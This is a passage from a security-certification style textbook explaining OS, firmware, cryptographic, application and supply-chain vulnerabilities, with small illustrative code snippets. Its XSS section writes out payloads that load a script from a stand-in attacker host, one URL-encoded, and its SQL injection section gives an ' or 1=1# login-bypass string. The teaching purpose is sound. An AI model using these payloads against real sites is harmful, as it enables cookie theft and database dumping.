embedded systems, such as IoT, are added to our surroundings. Each system runs
specialty operating systems and introduces vulnerabilities and potential pathways
into corporate infrastructures.
Example OS Vulnerabilities
• Microsoft Windows—One of the most notorious vulnerabilities in Windows
history was the MS08-067 vulnerability in Windows Server Service. This
vulnerability allowed remote code execution if a specially crafted packet was sent
to a Windows server. This vulnerability was exploited by the Conficker worm in
2008, which infected millions of computers worldwide. Additionally, MS17-010
represents a significant and critical security update released by Microsoft in March
2017. This update addressed multiple vulnerabilities in Microsoft’s implementation
of the Server Message Block (SMB) protocol (a network file-sharing protocol)
that could allow remote code execution (RCE). Essentially, these vulnerabilities, if
exploited, could allow an attacker to install programs; view, change, or delete data;
or create new accounts with full user rights.
The significance of MS17-010 is tied closely to the EternalBlue exploit, which leveraged
the vulnerabilities in early versions of the SMB protocol for malicious purposes. The
most famous misuse of EternalBlue was during the WannaCry ransomware attack
in May 2017, where it was used to propagate the ransomware across networks
worldwide, leading to massive damage and disruption. This event underlined the critical
importance of timely system patching and reinforced the potential global impact of
such vulnerabilities.
Vulnerability Types
Legacy and End-of-Life (EOL) Systems
Hardware vulnerabilities, particularly those associated with end-of-life and legacy
systems, present considerable security challenges for many organizations, as
patches or fixes for vulnerabilities are either unavailable or difficult to apply.
End-of-life (EOL) and legacy systems share a common characteristic: they are
both outdated. EOL systems may be legacy systems, and some legacy systems
are also EOL.
The manufacturer or vendor no longer supports EOL systems, so they do not
receive updates, including critical security patches. This makes them vulnerable to
newly discovered threats. Conversely, legacy systems, while still outdated, may
still be fully supported by the vendor.
An EOL system is a specific product or version of a product that the manufacturer
or vendor has publicly declared as no longer supported. It is also possible for
open-source projects to be abandoned by the maintainers. An EOL system can
be a hardware device, a software application, or an operating system. Products
should be replaced or updated before they reach EOL status to ensure they remain
supported by their vendors and receive critical security patches. Notable EOL
product examples include the Windows 7 and Server 2008 operating systems, which
stopped receiving updates in January 2020. These systems are significantly more
vulnerable to attacks due to the absence of security patches for new vulnerabilities.
Despite their EOL status, they are still in use in many environments.
Many devices (peripheral devices especially) remain on sale with known severe
vulnerabilities in firmware or drivers and no possibility of vendor support to
remediate them, especially in secondhand, recertified, or renewed/reconditioned
marketplaces. Examples include recertified computer equipment, consumer-grade
and recertified networking equipment, and various Internet of Things devices.
Legacy systems typically describe outdated software methods, technology,
computer systems, or application programs that continue to be used despite their
shortcomings. Legacy systems often remain in use for extended periods because
the organization’s leadership recognizes that replacing or redesigning them will
be expensive or pose significant operational risks stemming from complexity. The
term “legacy” does not necessarily mean that the vendor no longer supports the
system but rather that it represents hardware and software methods that are
no longer popular and often incompatible with newer architectures or methods.
Legacy systems often remain in use because they operate with sufficient reliability,
have been incorporated into many critical business functions, and are familiar to
long-tenured staff.
Assessing the risks associated with using EOL and legacy products, such as lack of
updates, lack of support, and compatibility issues with newer systems, is crucial.
EOL and legacy product replacements must continue to meet the organization’s
requirements, maintain compatibility with existing infrastructure, and support
reliable data migration. Selection criteria must consider the availability of vendor
support, device warranty details, and marketplace performance/reputation.
Transitioning costs must be carefully assessed, too, including licensing, hardware
upgrades, and professional service implementation fees. The work to transition
away from EOL and legacy products must minimize disruptions and ensure long-
term sustainability.
Firmware Vulnerabilities
Firmware is the foundational software that controls hardware and can contain
significant vulnerabilities. For instance, the Meltdown and Spectre vulnerabilities
identified in 2018 impacted almost all computers and mobile devices. These
vulnerabilities were associated with the processors used inside the devices and
allowed malicious programs to steal data as it was being processed. Another
vulnerability, “LoJax,” discovered in the Unified Extensible Firmware Interface
(UEFI) firmware in 2018, enabled an attacker to persist on a system even after a
complete hard drive replacement or OS reinstallation. End-of-life (EOL) hardware
vulnerabilities arise when manufacturers cease providing product updates, parts, or
patches to the firmware.
Virtualization Vulnerabilities
While offering numerous benefits such as cost savings, scalability, and efficiency,
virtualization also introduces unique vulnerabilities. A significant one is the concept
of VM escape. This happens when an attacker with access to a virtual machine
breaks out of this isolated environment and gains access to the host system or
other VMs running on the same host. Such a vulnerability could allow an attacker to
gain control of all virtual machines running on a single physical server, leading to a
potentially devastating security breach.
A famous example is the “Cloudburst” vulnerability in VMware’s virtual machine
display function. The Cloudburst vulnerability, officially designated as CVE-2009-
1244, was a critical security flaw discovered in 2009 in VMware’s ESX Server,
a popular enterprise-level virtualization platform. A vulnerability in the virtual
machine display function allowed a guest operating system to execute code on the
host operating system.
Another significant vulnerability associated with virtualization involves resource
reuse. Virtual machines are frequently created, used, and then deleted in a
virtualized environment. If the resources, such as disk space or memory, are not
properly sanitized between each use, sensitive data could be leaked between virtual
machines. For instance, a new virtual machine may be allocated disk space that was
previously used by another VM, and if this disk space is not properly wiped, the new
VM could recover sensitive data from the previous VM.
Thorough data sanitization practices, ensuring data encryption throughout the
lifecycle, and implementing robust encryption key management practices mitigate
the risk of resource reuse in cloud infrastructure. Training on cloud provider
security features and best practices and segregating resources based on security
levels also mitigates risks.
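The resource reuse problem can be illustrated with a toy model of disk-block reallocation between tenants. The class and data here are hypothetical, purely to show why sanitization before reuse matters:

```python
class DiskPool:
    """Toy model of block reallocation between VMs. Without wiping,
    the next tenant can read the previous tenant's data."""

    def __init__(self, size: int):
        self.blocks = [b""] * size

    def write(self, idx: int, data: bytes) -> None:
        self.blocks[idx] = data

    def reallocate(self, idx: int, wipe: bool) -> bytes:
        if wipe:
            self.blocks[idx] = b"\x00"  # sanitize before reuse
        return self.blocks[idx]         # what the next VM sees

pool = DiskPool(4)
pool.write(0, b"patient-records")
leaked = pool.reallocate(0, wipe=False)  # previous data still present
clean = pool.reallocate(0, wipe=True)    # zeroed before handover
```

Real hypervisors and cloud platforms perform the equivalent wipe (or encrypt each tenant's data with a per-tenant key) so deallocated storage never leaks.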
Virtualization platforms depend upon specialized hypervisors that contain security
vulnerabilities and weaknesses. Attackers exploit hypervisors to gain unauthorized
access and compromise the virtual machines (VMs) running on them. Hypervisors
typically provide specialized management interfaces so administrators can control
and monitor their virtualized environments. These interfaces can become potential
attack vectors if insecure. For example, weak authentication, lack of encryption, or
vulnerabilities in communication protocols can lead to unauthorized access to the
virtualized environment. Like any software, hypervisors have vulnerabilities that
must be regularly patched.
Zero-Day Vulnerabilities
Zero-day vulnerabilities refer to previously unknown software or hardware flaws
that attackers can exploit before developers or vendors become aware of or have
a chance to fix them. The term “zero-day” signifies that developers have “zero days”
to fix the problem once the vulnerability becomes known. These vulnerabilities are
significant because they can cause widespread damage before a patch is available.
An attacker exploiting a zero-day vulnerability can compromise systems, steal
sensitive data, launch further attacks, or cause other forms of harm, often
undetected. The stealth and unpredictability of zero-day attacks make them
particularly dangerous. They are a favored tool of advanced threat actors, such as
organized crime groups and nation-state attackers, who often use them in targeted
attacks against high-value targets, such as governmental institutions and major
corporations.
Since these vulnerabilities are unknown to the public or the vendor during
exploitation, traditional security measures like antivirus software and firewalls,
which rely on known signatures or attack patterns, are often ineffective against
them. The discovery of a zero-day vulnerability typically triggers a race between
threat actors, who aim to exploit it, and developers, who work to patch it. Upon
discovering a zero-day vulnerability, ethical security researchers usually follow a
process known as responsible disclosure, which is designed to privately inform the
vendor so a patch can be developed before the vulnerability is publicly disclosed.
This practice aims to limit the potential harm caused by discovering a zero-day
vulnerability.
The term “zero-day” is usually applied to the vulnerability itself but can also refer to an
attack or malware that exploits it.
Misconfiguration Vulnerabilities
Misconfiguration of systems, networks, or applications is a common cause of
security vulnerabilities. These can lead to unauthorized access, data leaks, or
even full-system compromises. These can occur across many areas within an IT
environment, from network equipment and servers to databases and applications.
In a cloud environment, misconfigurations, such as improperly managed access
permissions on storage buckets, can lead to significant data leaks.
Default configurations of systems, applications, or devices are often designed
to prioritize ease of use, setup simplicity, and broad compatibility. However, this
often results in a security trade-off, making these defaults a common source of
vulnerability. For instance, default configurations may enable unnecessary services
that open potential attack vectors or include easily guessable default credentials,
such as ‘admin’ for both username and password. Some systems may have overly
permissive configurations that heavily focus on usability and potentially expose
sensitive information if left unmodified. Network devices like routers and switches
often have default configurations that compromise security, such as well-
documented default credentials and the use of vulnerable management protocols.
Similarly, cloud services often have default settings that leave data storage
or compute instances publicly accessible. Administrators and engineers must
carefully configure systems, devices, and applications according to the principle of
least privilege and published best practices. This includes changing default login
credentials, tightening access controls, and regularly auditing configurations to
ensure ongoing security, as a minimum.
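An audit of the kind described above can start as a simple check of inventoried device credentials against known vendor defaults. The device names and credential list here are hypothetical:

```python
# Hypothetical hardening check: flag devices still using vendor defaults.
DEFAULT_CREDS = {("admin", "admin"), ("admin", "password"), ("root", "root")}

def audit(devices):
    """Return the names of devices whose credentials
    match a known default pair."""
    return [name for name, user, pw in devices
            if (user, pw) in DEFAULT_CREDS]

devices = [
    ("edge-router", "admin", "admin"),       # flagged
    ("core-switch", "netops", "S7r0ng!pa"),  # passes
]
flagged = audit(devices)  # ['edge-router']
```

In practice this check would run against a configuration management database and would also look for open default services and permissive access rules, not just credentials.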
Providing support to resolve functional issues in an IT environment is an essential
part of maintaining business operations, but it can also inadvertently lead to
misconfigurations and vulnerabilities. For example, while troubleshooting an issue,
a support technician may temporarily disable security features or loosen access
controls to help isolate a problem. If these changes are not reverted after the
issue is resolved, they may leave the system vulnerable. Similarly, installing new
software or modifying existing software configurations can introduce unexpected
vulnerabilities or leave the system less secure. Remote support tools can also
pose a risk if not adequately secured, and an attacker could exploit these tools to
gain access to a system or network. When addressing urgent issues and outages,
especially high-impact ones, best practices for change management are often
bypassed. Changes are made without proper documentation, testing, or approval,
leading to misconfigurations or system instability.
Cryptographic Vulnerabilities
Cryptographic vulnerabilities refer to weaknesses in cryptographic systems,
protocols, or algorithms that can be exploited to compromise data. The significance
of such vulnerabilities is profound, as cryptography forms the backbone of
secure communication and data protection in modern digital systems. Moreover,
weaknesses in cryptographic algorithms themselves can also pose a threat. For
instance, MD5 and SHA-1, once widely used cryptographic hash functions, are now
considered insecure due to vulnerabilities that allow for collision attacks, where two
different inputs produce the same hash output, which is particularly troubling in
scenarios where hashes are used to protect passwords.
Practical examples of cryptographic vulnerabilities include the Heartbleed
vulnerability, which exploited a flaw in the OpenSSL cryptographic library, allowing
attackers to read otherwise secure communication. Another example is the KRACK
(Key Reinstallation Attacks) vulnerability in the WPA2 protocol that protects Wi-Fi
traffic. This vulnerability allows an attacker within range of a victim to intercept and
decrypt some types of sensitive network traffic.
Symmetric and asymmetric encryption algorithms and cipher suites can also have
vulnerabilities that lead to potential security issues. One of the most significant
vulnerabilities in symmetric encryption algorithms is the use of weak keys. The
Data Encryption Standard (DES) algorithm, once a popular symmetric encryption
standard, was found to be vulnerable to brute force attacks due to its 56-bit key
size. The DES, developed in the early 1970s, was first publicly demonstrated to be
vulnerable to brute force attacks in the late 1990s. This led to its replacement by
more secure standards such as Triple DES and eventually the Advanced Encryption
Standard (AES). Triple DES (3DES), which applies the DES algorithm three times
to protect data, was considered significantly more secure than DES when it was
initially introduced.
However, with the continued advancement of computational power and the
discovery of additional attack methods, 3DES vulnerabilities have been found, most
notably the “Sweet32” birthday attack (CVE-2016-2183) published in August 2016.
The US National Institute of Standards and Technology (NIST) officially deprecated
3DES in 2017 and recommended its discontinuation by 2023.
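The "birthday" weakness behind attacks like Sweet32 can be demonstrated by searching for a collision in a deliberately weakened hash. This sketch truncates SHA-256 to a 32-bit digest as a stand-in for a weak primitive; a collision is expected after roughly 2**16 (about 65,000) attempts rather than 2**32:

```python
import hashlib

def weak_hash(data: bytes, nbytes: int = 4) -> bytes:
    """Stand-in for a weak primitive: SHA-256 truncated to 32 bits."""
    return hashlib.sha256(data).digest()[:nbytes]

def find_collision():
    """Birthday search: remember every digest seen and stop when
    two different messages produce the same one."""
    seen = {}
    i = 0
    while True:
        msg = b"msg-%d" % i
        h = weak_hash(msg)
        if h in seen:
            return seen[h], msg
        seen[h] = msg
        i += 1

m1, m2 = find_collision()
# m1 != m2, yet weak_hash(m1) == weak_hash(m2)
```

The same square-root effect is why 64-bit block ciphers such as 3DES become unsafe after a few gigabytes of traffic under one key, and why MD5 and SHA-1 collisions became practical.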
Some asymmetric encryption algorithms also have vulnerabilities. For instance, RSA,
a widely used public key cryptosystem, can be vulnerable if small key sizes are used
or if the random number generation for creating the keys is weak. Also, if the same
key pair is used for an extended period in an asymmetric scheme, the likelihood of
the key being compromised increases.
Cipher suites, which describe combinations of encryption algorithms used in protocols
like SSL/TLS, can also have vulnerabilities. SSL/TLS is commonly used to secure web
browser sessions, encrypting communication between a browser and a web server
and essentially turning an “http” web address into a secure “https” address. SSL/TLS is
also used for secure email transmission (SMTP, POP, and IMAP protocols), secure voice
over IP (VoIP) calls, and secure file transfers (FTPS). In all these cases, SSL/TLS helps
protect sensitive data from being intercepted and read by unauthorized parties. Other
networked applications and services also use SSL/TLS, including VPN connections, chat
applications, and mobile apps that transmit sensitive data.
Prominent examples of attacks against cipher suite vulnerabilities include the BEAST
(Browser Exploit Against SSL/TLS) and POODLE (Padding Oracle On Downgraded
Legacy Encryption) attacks that target weaknesses in the cipher suites used by SSL
and early versions of TLS. Both attacks exploited similar implementation flaws.
Rooting, sideloading, and jailbreaking offer users greater control and flexibility
over their devices, but they also introduce many risks for organizations. Rooting,
sideloading, and jailbreaking can weaken the security measures implemented by
the device manufacturer and operating system and make it easier for attackers
to exploit vulnerabilities, install malware, or gain unauthorized access to sensitive
corporate information. By enabling access to unverified app stores or installing
apps from unofficial sources, there is an increased risk of downloading malicious or
compromised applications.
Review Activity:
Device and OS Vulnerabilities
The PC runs process management software that the owner cannot run
on Windows 11. What are the risks arising from this, and how can they be
mitigated?
Topic 8B
Application and Cloud Vulnerabilities
Application Vulnerabilities
Race Condition and TOCTOU
Application race condition vulnerabilities refer to software flaws associated with
the timing or order of events within a software program, which can be manipulated,
causing undesirable or unpredictable outcomes. A race condition occurs when the
outcome depends on two or more operations executing in a particular order. When
software logic does not check or enforce the expected order of events, security issues such as
data corruption, unauthorized access, or similar security breaches may occur. Race
conditions manifest in a wide variety of ways, such as time-of-check to time-of-
use (TOCTOU) vulnerabilities, where a system state changes between the check
(verification) stage and the use (execution) stage.
Imagine a scenario where a multi-threaded banking application used one program
thread to check an account balance and another thread to withdraw money. If
an attacker manipulates the sequence of execution in this example, they could
potentially overdraw the account. These vulnerabilities underscore the importance
of atomic operations where checking and execution are done as a single, indivisible
operation, mitigating the likelihood of exploitation.
Two significant examples of race conditions include the Dirty COW Vulnerability
(CVE-2016-5195), which is a race condition vulnerability in the Linux Kernel, allowing
a local user to gain privileged access, and the "SMBGhost" vulnerability
(CVE-2020-0796) in the Microsoft Server Message Block 3.1.1 (SMBv3)
protocol, which allows an attacker to execute arbitrary code on a target
SMB server or client. Race
conditions are often mitigated by developers through the use of locks, semaphores,
and monitors in multi-threaded applications.
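The TOCTOU pattern and its lock-based mitigation can be sketched with an invented account class. Without the lock, two threads can both pass the balance check before either withdrawal runs; with it, check and act form one atomic step:

```python
import threading

class Account:
    """Toy account illustrating check-then-act on a shared balance."""

    def __init__(self, balance: int):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_unsafe(self, amount: int) -> bool:
        if self.balance >= amount:   # time-of-check
            # another thread may interleave here and also pass the check
            self.balance -= amount   # time-of-use
            return True
        return False

    def withdraw_atomic(self, amount: int) -> bool:
        with self._lock:             # check and act cannot interleave
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False
```

With a starting balance of 100, two atomic withdrawals of 60 can never both succeed; with the unsafe version and adversarial timing, they could, overdrawing the account.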
Lesson 8 : Explain Vulnerability Management | Topic 8B
Memory Injection
Memory injection vulnerabilities refer to a type of security flaw where an attacker
can introduce (inject) malicious code into a running application’s process memory.
An attacker often designs the injected code to alter an application’s behavior to
provide unauthorized access or control over the system. Injection vulnerabilities
are significant because they often lead to severe security breaches. Attackers often
use memory injection vulnerabilities to inject code that installs malware, exfiltrates
sensitive data, or creates a backdoor for future access. Injected code generally
runs with the same level of privileges as the compromised application, which
can lead to a full system compromise if the exploited application has high-level
permissions. Common memory injection attacks include buffer overflow attacks,
format string vulnerabilities, and code injection attacks. These types of attacks are
typically mitigated with secure coding practices such as input and output validation,
encoding, type-casting, access controls, static and dynamic application testing, and
several other techniques.
Buffer Overflow
A buffer is an area of memory that the application reserves to store expected
data. To exploit a buffer overflow vulnerability, the attacker passes data that
deliberately overfills the buffer. One of the most common vulnerabilities is a stack
overflow. The stack is an area of memory used by a program subroutine. It includes
a return address, which is the location of the program that called the subroutine.
An attacker could use a buffer overflow to change the return address, allowing the
attacker to run arbitrary code on the system.
Buffer overflow attacks are mitigated on modern hardware and operating systems
via address space layout randomization (ASLR) and Data Execution Prevention
(DEP) controls, utilizing type-safe programming languages and incorporating
secure coding practices.
When executed normally, a function will return control to the calling function. If the code is
vulnerable, an attacker can pass malicious data to the function, overflow the stack, and run
arbitrary code to gain a shell on the target system.
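Python cannot corrupt real process memory, but the stack-smashing idea can be simulated conceptually: a fixed-size buffer sits next to a saved return address, and an unchecked copy overwrites it. Everything here is an illustrative model, not actual exploitation:

```python
def vulnerable_copy(stack, user_input):
    """No bounds check: input longer than the 8-slot buffer spills
    into adjacent stack slots, including the saved return address."""
    for i, b in enumerate(user_input):
        stack[i] = b
    return stack

# Slots 0-7 model the buffer; slot 8 models the saved return address.
stack = [0] * 8 + ["RET:legit_caller"]

# 8 filler bytes, then a value that lands on the return-address slot.
payload = list(b"A" * 8) + ["RET:attacker_code"]
vulnerable_copy(stack, payload)
# stack[8] is now "RET:attacker_code" -- control flow hijacked
```

A bounds-checked copy (or a memory-safe language) would refuse to write past slot 7, which is exactly what ASLR, DEP, and type-safe languages combine to enforce on real systems.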
Malicious Update
A malicious update refers to an update that appears legitimate but contains
harmful code, often used by cybercriminals to distribute malware or execute a
cyberattack. The update may claim to fix software bugs or offer new features but is
instead designed to compromise a system. The significance of such attacks lies in
their deceptive nature; users trust and frequently accept software updates, making
malicious updates a highly effective infiltration strategy. Malicious updates can be
difficult to protect against, but secure software supply chain management, digital
signature verification, and other software security practices help mitigate these risks.
In 2017, the legitimate software CCleaner was compromised when an unauthorized
update was released containing a malicious payload. This affected millions of users
who downloaded the update, believing it was a standard upgrade to improve their
system’s performance. https://arstechnica.com/information-technology/2017/09/
backdoor-malware-planted-in-legitimate-software-updates-to-ccleaner/
Another notable case is the 2020 SolarWinds attack, where an update to the
SolarWinds Orion platform was used to distribute a malicious backdoor to
numerous government and corporate networks, leading to significant data
breaches. https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-
cyberattack-the-untold-story-of-the-solarwinds-hack
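One layer of defense is verifying a downloaded update against a digest the vendor publishes out-of-band (full supply chain protection also requires signature verification and build integrity). A minimal sketch:

```python
import hashlib
import hmac

def verify_update(data: bytes, published_sha256_hex: str) -> bool:
    """Reject the update unless its digest matches the value the
    vendor published separately (e.g., on their HTTPS site)."""
    actual = hashlib.sha256(data).hexdigest()
    # constant-time comparison avoids timing side channels
    return hmac.compare_digest(actual, published_sha256_hex)

good = b"update-v2.1 payload"
expected = hashlib.sha256(good).hexdigest()  # what the vendor publishes
verify_update(good, expected)                 # True
verify_update(b"tampered payload", expected)  # False
```

Note that a checksum only helps if it is obtained through a channel the attacker cannot also tamper with, which is why signed updates with vendor-held private keys are the stronger control.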
Evaluation Scope
Evaluation target or scope refers to the product, system, or service being analyzed
for potential security vulnerabilities. This could be a software application, a
network, a security service, or even an entire IT infrastructure. The target is the
focus of a specific evaluation process, where it is subjected to rigorous testing
and analysis to identify any possible weaknesses or vulnerabilities in its design,
implementation, or operation. For application vulnerabilities, the target would refer
to a specific software application. Security analysts assess application code, logic,
data handling, authentication mechanisms, and many other aspects relevant to its
security. Identified vulnerabilities often range from common ones, such as injection
flaws, broken authentication, and sensitive data exposure, to more obscure ones
related to the application's unique features or purpose. The primary goal of the
evaluation is to mitigate risk, improve the application's security posture, and ensure
compliance with relevant security standards or regulations.
HTTP is stateless, meaning each request is independent, and the server does not
retain information about the client’s state. Web applications must manage sessions
and maintain state using mechanisms such as cookies or session IDs. Improper
session management, such as predictable session IDs, session fixation, or session
hijacking, is associated with many types of web application attacks, such as
cross-site request forgery (CSRF) and cross-site scripting (XSS). These attacks exploit
the web’s inherent trust in requests or scripts that appear to come from valid users
or trusted sites.
2. The attacker crafts a URL to perform a code injection against the trusted site.
This could be coded in a link from the attacker’s site to the trusted site or a
link in an email message.
3. When the user clicks the link, the trusted site returns a page containing
the malicious code injected by the attacker. As the browser is likely to be
configured to allow the site to run scripts, the malicious code will execute.
The malicious code could be used to deface the trusted site (by adding any
sort of arbitrary HTML code), steal data from the user’s cookies, try to intercept
information entered into a form, perform a request forgery attack, or try to install
malware. The crucial point is that the malicious code runs in the client’s browser
with the same permission level as the trusted site.
An attack where the malicious input comes from a crafted link is a reflected or
nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a
back-end database or content management system used by the trusted site. For
example, the attacker may submit a post to a bulletin board with a malicious script
embedded in the message. When other users view the message, the malicious
script is executed. For example, with no input sanitization, a threat actor could type
the following into a new post text field:
Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.
Users viewing the post will have the malicious script hook.js execute in their
browser.
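Input sanitization defeats this kind of stored XSS. As a simple illustration, Python's standard library html.escape function converts markup characters into harmless entities before the post is stored or rendered:

```python
import html

# The malicious post from the example above.
post = ('Check out this amazing <a href="https://trusted.foo">website</a>'
        '<script src="https://badsite.foo/hook.js"></script>')

# Escaping converts the markup characters into HTML entities, so a
# browser renders the payload as inert text rather than executing it.
safe = html.escape(post)
print(safe)
```

Note that escaping also neutralizes the legitimate-looking link; real applications typically combine escaping with an allowlist of permitted markup.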
A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts
often use the Document Object Model (DOM) to modify the content and layout
of a web page. For example, the “document.write” method enables a page to take
some user input and modify the page accordingly. An exploit against a client-side
script could work as follows:
1. The attacker identifies an input validation vulnerability in the trusted site. For
example, a message board might take the user’s name from an input text box
and show it in a header.
https://trusted.foo/messages?user=james
2. The attacker crafts a URL to modify the parameters of a script that the server
will return, such as:
https://trusted.foo/messages?user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E
3. The server returns a page with the legitimate DOM script embedded, but with
the parameter modified to inject the following content:
James<script src="https://badsite.foo/hook.js"></script>
4. The browser renders the page using the DOM script, adding the text “James”
to the header, but also executing the hook.js script at the same time.
DOM-based cross-site scripting (XSS) occurs when a web application's client-side script
manipulates the Document Object Model (DOM) of a webpage. Unlike other forms of
XSS attacks that exploit server-side vulnerabilities, DOM-based XSS attacks target the
client-side environment, allowing an attacker to inject malicious script code executed
within the user's browser in the context of the targeted webpage.
For example, consider a web form that is supposed to take a name as input. If the
user enters "Bob,” the application runs the following query:
SELECT * FROM tbl_user WHERE username = 'Bob'
If a threat actor enters the string ' or 1=1# and this input is not sanitized, the
following malicious query will be executed:
SELECT * FROM tbl_user WHERE username = '' or 1=1#
The logical statement 1=1 is always true, and the # character turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.
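The standard defense against this kind of injection is a parameterized query, which forces user input to be treated purely as data. The following Python sketch demonstrates both the flaw and the fix using the standard library's sqlite3 module; note that SQLite uses -- rather than # as its comment marker, so the payload is adjusted accordingly, and the table contents are illustrative.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tbl_user (username TEXT)")
conn.executemany("INSERT INTO tbl_user VALUES (?)", [("Bob",), ("Alice",)])

malicious = "' or 1=1--"  # SQLite's comment marker is -- rather than #

# Vulnerable: string concatenation lets the input rewrite the query,
# producing: SELECT * FROM tbl_user WHERE username = '' or 1=1--'
query = "SELECT * FROM tbl_user WHERE username = '" + malicious + "'"
print(conn.execute(query).fetchall())  # dumps every row

# Safe: a parameterized query treats the entire input as a literal value.
rows = conn.execute("SELECT * FROM tbl_user WHERE username = ?",
                    (malicious,)).fetchall()
print(rows)  # no user is literally named "' or 1=1--", so no rows match
```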
• Reverse proxy—this is positioned at the cloud network edge and directs traffic
to cloud services if the contents of that traffic comply with policy. This does not
require configuration of the users’ devices. This approach is only possible if the
cloud application has proxy support.
Supply Chain
Software supply chain vulnerabilities refer to the potential risks and weaknesses
introduced into software products during their development, distribution, and
maintenance lifecycle. This supply chain describes many stages, from initial
coding to end-user deployment, and includes various service providers, hardware
providers, and software providers.
Service Providers
Service providers, such as cloud services or third-party development agencies,
play a role in the software supply chain by offering development, testing, and
deployment platforms or directly contributing to the software’s codebase.
Vulnerabilities can be introduced if these services have inadequate security
measures or if the communication between these services and the rest of the
supply chain is not secured correctly.
Hardware Suppliers
Hardware suppliers play a crucial role in the software supply chain and can be
potential sources of vulnerabilities. The hardware on which software runs or
interacts with forms the base of the technology stack. If this hardware layer is
compromised, it can lead to severe security issues. This is particularly true for
firmware or low-level software drivers interacting closely with the hardware. If
a hardware supplier fails to apply robust security practices in their design and
manufacturing processes, vulnerabilities can be introduced that compromise the
entire system.
For example, a hardware component could come with preinstalled firmware that
contains a known vulnerability, or it might be susceptible to physical tampering
that leads to a breach in security. Similarly, hardware devices often require
specific drivers to function correctly. If these drivers are not updated regularly or
are sourced from unreliable providers, they can introduce vulnerabilities into the
software stack.
Furthermore, hardware suppliers often provide the entire software stack running
on the device for IoT and embedded systems, making them a significant factor in
a system’s overall security. Therefore, it’s crucial for software supply chain security
to ensure that hardware suppliers adhere to stringent security standards and that
hardware components and associated low-level software are regularly updated and
patched to address any potential vulnerabilities.
Software Providers
Software providers, including makers of libraries, frameworks, and other third-party
components used in the software, are a common source of vulnerabilities. If third-
party components have vulnerabilities or are outdated, they can expose the entire
application to potential attacks. In all these relationships, trust is implicitly placed in
each provider to maintain high security. If any link in this chain fails to meet these
expectations, it can lead to software supply chain vulnerabilities.
An SBOM aims to provide transparency and visibility into the software supply chain,
which can significantly help mitigate software supply chain issues. By detailing all
components used in a software product, an SBOM enables developers, security
teams, and end users to understand the functional components of their software.
This visibility aids in identifying potential vulnerabilities in third-party components,
allowing them to be patched or replaced before issues materialize. It also helps
track software components’ origin, ensuring they come from trusted sources.
After a vulnerability disclosure or a security incident, an SBOM supports rapid
response and remediation. Security teams can quickly determine whether their
software is affected by a disclosed vulnerability in a particular component and take
appropriate action.
An SBOM is a critical tool for managing and securing the software supply chain
because it contributes to a more proactive and informed approach to identifying
and managing potential software supply chain issues.
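In practice, an SBOM is a machine-readable inventory. The sketch below is a simplified fragment loosely modeled on the CycloneDX JSON format; the component names and versions are illustrative, not a real product's inventory.

```python
import json

# A minimal SBOM-style record: one entry per third-party component.
sbom = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "name": "openssl", "version": "3.0.7"},
        {"type": "library", "name": "log4j-core", "version": "2.14.1"},
    ],
}

# After a disclosure naming a component, the SBOM answers "are we
# affected?" with a simple lookup instead of a manual code audit.
affected = [c for c in sbom["components"] if c["name"] == "log4j-core"]
print(json.dumps(affected, indent=2))
```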
Review Activity:
Application and Cloud Vulnerabilities
Topic 8C
Vulnerability Identification Methods
Vulnerability Scanning
Vulnerability management is a cornerstone of modern cybersecurity practices
aimed at identifying, classifying, remediating, and mitigating vulnerabilities within a
system or network. One crucial aspect of vulnerability management is vulnerability
scanning, a systematic process of probing a system or network using specialized
software tools to detect security weaknesses. Vulnerability scans are performed
internally and externally to inventory vulnerabilities from different network
viewpoints. Vulnerabilities identified during scanning are then classified and
prioritized for remediation by security operations teams.
Vulnerability scanning also supports application security, as it helps to locate and
identify misconfigurations and missing patches in software. Advanced vulnerability
scanning techniques focused on application security include specialized application
scanners, pen-testing frameworks, and static and dynamic code testing.
Vulnerability scanners like OpenVAS and Nessus are popular tools offering
a broad range of features designed to analyze network equipment, operating
systems, databases, patch compliance, configuration, and many other systems.
While these tools are very effective, application security analysis warrants much
more specialized approaches. Several specialized tools exist to more deeply analyze
how applications are designed to operate and can locate vulnerabilities not typically
identified using generalized scanning approaches.
Greenbone OpenVAS vulnerability scanner with Security Assistant web application interface
as installed on Kali Linux. (Screenshot used with permission from Greenbone Networks,
http://www.openvas.org.)
device management interfaces, but they are not given privileged access. While you
may discover more weaknesses with a credentialed scan, you sometimes will want
to narrow your focus to think like an attacker who doesn’t have specific high-level
permissions or total administrative access. Non-credentialed scanning is often the
most appropriate technique for external assessment of the network perimeter or
when performing web application scanning.
A credentialed scan is given a user account with login rights to various hosts, plus
whatever other permissions are appropriate for the testing routines. This sort of
test allows much more in-depth analysis, especially in detecting when applications
or security settings may be misconfigured. It also shows what an insider attack, or
one where the attacker has compromised a user account, may be able to achieve. A
credentialed scan is a more intrusive type of scan than non-credentialed scanning.
Configuring credentials for use in target (scope) definitions in Greenbone OpenVAS as installed on
Kali Linux. (Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)
Package Monitoring
Another important capability in application vulnerability assessment practices
includes package monitoring. Package monitoring is associated with vulnerability
identification because it tracks and assesses the security of third-party software
packages, libraries, and dependencies used within an organization to ensure that
they are up to date and free from known vulnerabilities that malicious actors could
exploit. Package monitoring is associated with the management of software bill of
materials (SBOM) and software supply chain risk management practices.
In an enterprise setting, package monitoring is typically achieved through
automated tools and governance policies. Automated software composition
analysis (SCA) tools track and monitor the software packages, libraries, and
dependencies used in an organization’s codebase. These tools can automatically
identify outdated packages or those with known vulnerabilities and suggest updates
or replacements. They work by continuously comparing the organization’s software
inventory against various databases of known vulnerabilities, such as the National
Vulnerability Database (NVD) or vendor-specific advisories.
In addition to these tools, organizations often implement governance policies
around software usage. These policies may require regular audits of software
packages, approval processes for adding new packages or libraries, and procedures
for updating or patching software when vulnerabilities are identified.
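At its core, the comparison an SCA tool automates can be sketched in a few lines of Python. The package names, versions, and advisory identifiers below are invented for illustration; real tools query live sources such as the NVD.

```python
# Toy "known vulnerable versions" database, keyed by (package, version).
known_vulns = {
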